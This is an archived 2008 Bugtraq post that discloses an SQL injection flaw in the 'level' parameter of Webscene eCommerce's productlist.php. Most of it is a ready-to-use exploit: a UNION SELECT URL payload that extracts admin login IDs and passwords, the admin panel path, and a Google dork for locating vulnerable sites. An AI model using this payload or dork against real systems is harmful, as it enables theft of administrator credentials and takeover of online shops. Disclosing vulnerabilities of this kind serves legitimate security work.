| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 14 Oct 2008 16:29:29 -0000
From: angel@...ng.cc
To: bugtraq@...urityfocus.com
Subject: Webscene eCommerce (level) Remote Sql Injection
#################################################################################
#
# Webscene eCommerce (level) Remote Sql Injection
#
# vendor : http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm
#
#################################################################################
#
#
# Bug Found By :Angela Chang (14-10-2008)
#
# contact: angel[at]ch4ng.cc
#
#
################################################################################
#
#
# Greetz: nyubi & Vrs-Chk
#
#
###############################################################################
vuln file : productlist.php
Input passed to the "level" is not properly verified
before being used. This can be exploited to execute
remote sql injection.
exploit : http://somehost/productlist.php?categoryid=20&level=[sql]
http://somehost/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser--
Login admin : http://somehost/admin/
Google dork : inurl:productlist.php?categoryid= level
########################################################################
__ _ _ _ __ _
__ _ _ _ / _` | ___ | | __ _ o O O __ | |_ __ _ _ _ / _` |
/ _` | | ' \ \__, | / -_) | | / _` | o / _| | ' \ / _` | | ' \ \__, |
\__,_| |_||_| |___/ \___| _|_|_ \__,_| TS__[O] \__|_ |_||_| \__,_| |_||_| |___/
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| {======|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
Powered by blists - more mailing lists